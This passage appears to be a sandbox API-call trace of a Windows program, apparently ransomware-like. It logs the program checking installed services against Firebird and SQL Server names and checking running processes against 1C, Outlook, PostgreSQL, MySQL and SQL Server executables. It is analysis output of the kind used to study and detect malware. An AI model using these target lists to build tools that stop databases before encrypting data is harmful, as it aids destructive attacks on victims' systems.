lpString2="gpsvc") returned 1 [0041.635] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0041.635] lstrlenW (lpString="iphlpsvc") returned 8 [0041.635] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0041.635] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0041.635] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0041.635] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0041.635] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0041.635] lstrlenW (lpString="LanmanServer") returned 12 [0041.635] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0041.635] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0041.635] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0041.636] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0041.636] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0041.636] lstrlenW (lpString="LanmanWorkstation") returned 17 [0041.636] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0041.636] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0041.636] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0041.636] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0041.636] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0041.636] lstrlenW (lpString="lmhosts") returned 7 [0041.636] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0041.636] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0041.636] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0041.636] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0041.636] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0041.636] lstrlenW (lpString="MMCSS") returned 5 [0041.636] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0041.636] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0041.636] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0041.636] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0041.636] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0041.636] lstrlenW (lpString="MpsSvc") returned 6 [0041.636] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0041.636] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0041.636] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0041.636] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0041.636] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0041.636] lstrlenW (lpString="Netman") returned 6 [0041.636] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0041.636] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0041.636] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0041.636] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0041.636] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0041.636] lstrlenW (lpString="netprofm") returned 8 [0041.636] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0041.637] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0041.637] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0041.637] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0041.637] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0041.637] lstrlenW (lpString="NlaSvc") returned 6 [0041.637] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0041.637] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0041.637] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0041.637] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0041.637] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0041.637] lstrlenW (lpString="nsi") returned 3 [0041.637] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0041.637] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0041.637] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0041.637] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0041.637] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0041.637] lstrlenW (lpString="PcaSvc") returned 6 [0041.637] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0041.637] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0041.637] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0041.637] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0041.637] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0041.637] lstrlenW (lpString="PlugPlay") returned 8 [0041.637] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0041.637] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0041.637] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0041.637] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0041.637] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0041.637] lstrlenW (lpString="Power") returned 5 [0041.637] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0041.637] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0041.637] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0041.637] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0041.637] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0041.637] lstrlenW (lpString="ProfSvc") returned 7 [0041.637] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0041.637] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0041.637] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0041.637] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0041.638] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0041.638] lstrlenW (lpString="RpcEptMapper") returned 12 [0041.638] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0041.638] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0041.638] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0041.638] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0041.638] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0041.638] lstrlenW (lpString="RpcSs") returned 5 [0041.638] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0041.638] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0041.638] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0041.638] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0041.638] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0041.638] lstrlenW (lpString="SamSs") returned 5 [0041.638] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0041.638] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0041.638] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0041.638] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0041.638] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0041.638] lstrlenW (lpString="Schedule") returned 8 [0041.638] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0041.638] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0041.638] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0041.638] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0041.638] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0041.638] lstrlenW (lpString="SENS") returned 4 [0041.638] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0041.638] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0041.638] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0041.638] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0041.638] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0041.638] lstrlenW (lpString="ShellHWDetection") returned 16 [0041.639] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0041.639] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0041.639] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0041.639] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0041.639] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0041.639] lstrlenW (lpString="Spooler") returned 7 [0041.639] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0041.639] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0041.639] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0041.639] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0041.639] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0041.639] lstrlenW (lpString="SysMain") returned 7 [0041.639] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0041.639] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0041.639] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0041.639] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0041.639] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0041.639] lstrlenW (lpString="Themes") returned 6 [0041.639] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0041.639] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0041.639] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0041.639] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0041.639] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0041.639] lstrlenW (lpString="TrkWks") returned 6 [0041.639] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0041.639] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0041.639] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0041.639] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0041.639] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0041.639] lstrlenW (lpString="UxSms") returned 5 [0041.639] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0041.639] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0041.639] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0041.639] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0041.639] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0041.639] lstrlenW (lpString="WdiServiceHost") returned 14 [0041.639] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0041.639] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0041.640] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0041.640] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0041.640] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0041.640] lstrlenW (lpString="WdiSystemHost") returned 13 [0041.640] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0041.640] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0041.640] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0041.640] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0041.640] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0041.640] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0041.640] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0041.640] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0041.640] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0041.640] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0041.640] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0041.640] lstrlenW (lpString="Winmgmt") returned 7 [0041.640] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0041.640] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0041.640] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0041.640] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0041.640] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0041.640] lstrlenW (lpString="WPDBusEnum") returned 10 [0041.640] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0041.640] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0041.640] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0041.640] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0041.640] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0041.640] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3f74520 | out: hHeap=0x600000) returned 1 [0041.641] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cc [0041.642] Process32FirstW (in: hSnapshot=0x1cc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0041.643] Process32NextW (in: hSnapshot=0x1cc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0041.644] lstrlenW (lpString="System") returned 6 [0041.644] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0041.644] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0041.644] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0041.644] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0041.644] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0041.644] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0041.644] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0041.644] Process32NextW (in: hSnapshot=0x1cc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0041.645] lstrlenW (lpString="smss.exe") returned 8 [0041.645] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0041.645] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0041.645] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0041.645] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0041.645] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0041.645] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0041.645] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0041.645] Process32NextW (in: hSnapshot=0x1cc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0041.645] lstrlenW (lpString="csrss.exe") returned 9 [0041.646] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0041.646] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0041.646] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0041.646] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0041.646] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0041.646] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0041.646] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0041.646] Process32NextW (in: hSnapshot=0x1cc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0041.646] lstrlenW (lpString="wininit.exe") returned 11 [0041.646] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0041.646] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0041.646] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0041.646] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0041.646] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0041.646] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0041.646] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0041.646] Process32NextW (in: hSnapshot=0x1cc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0041.647] lstrlenW (lpString="csrss.exe") returned 9 [0041.647] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0041.647] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0041.647] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0041.647] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0041.647] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0041.647] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0041.647] Process32NextW (in: hSnapshot=0x1cc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0041.648] lstrlenW (lpString="winlogon.exe") returned 12 [0041.648] Process32NextW (in: hSnapshot=0x1cc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0041.648] lstrlenW (lpString="services.exe") returned 12 [0041.648] Process32NextW (in: hSnapshot=0x1cc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0041.649] lstrlenW (lpString="lsass.exe") returned 9 [0041.649] Process32NextW (in: hSnapshot=0x1cc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0041.650] lstrlenW (lpString="lsm.exe") returned 7 [0041.650] Process32NextW (in: hSnapshot=0x1cc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0041.650] lstrlenW (lpString="svchost.exe") returned 11 [0041.650] Process32NextW (in: hSnapshot=0x1cc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0041.651] lstrlenW (lpString="svchost.exe") returned 11 [0041.651] Process32NextW (in: hSnapshot=0x1cc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0041.651] lstrlenW (lpString="svchost.exe") returned 11 [0041.651] Process32NextW (in: hSnapshot=0x1cc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0041.652] lstrlenW (lpString="svchost.exe") returned 11 [0041.652] Process32NextW (in: hSnapshot=0x1cc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0041.653] lstrlenW (lpString="svchost.exe") returned 11 [0041.653] Process32NextW (in: hSnapshot=0x1cc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0041.653] lstrlenW (lpString="audiodg.exe") returned 11 [0041.653] Process32NextW (in: hSnapshot=0x1cc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0041.654] lstrlenW (lpString="svchost.exe") returned 11 [0041.654] Process32NextW (in: hSnapshot=0x1cc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0041.654] lstrlenW (lpString="svchost.exe") returned 11 [0041.654] Process32NextW (in: hSnapshot=0x1cc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0041.655] lstrlenW (lpString="dwm.exe") returned 7 [0041.655] Process32NextW (in: hSnapshot=0x1cc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0041.656] lstrlenW (lpString="explorer.exe") returned 12 [0041.656] Process32NextW (in: hSnapshot=0x1cc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0041.656] lstrlenW (lpString="spoolsv.exe") returned 11 [0041.656] Process32NextW (in: hSnapshot=0x1cc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0041.657] lstrlenW (lpString="taskhost.exe") returned 12 [0041.657] Process32NextW (in: hSnapshot=0x1cc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0041.657] lstrlenW (lpString="svchost.exe") returned 11 [0041.658] Process32NextW (in: hSnapshot=0x1cc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0041.658] lstrlenW (lpString="taskeng.exe") returned 11 [0041.658] Process32NextW (in: hSnapshot=0x1cc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0041.659] lstrlenW (lpString="taskhost.exe") returned 12 [0041.659] Process32NextW (in: hSnapshot=0x1cc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x788, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 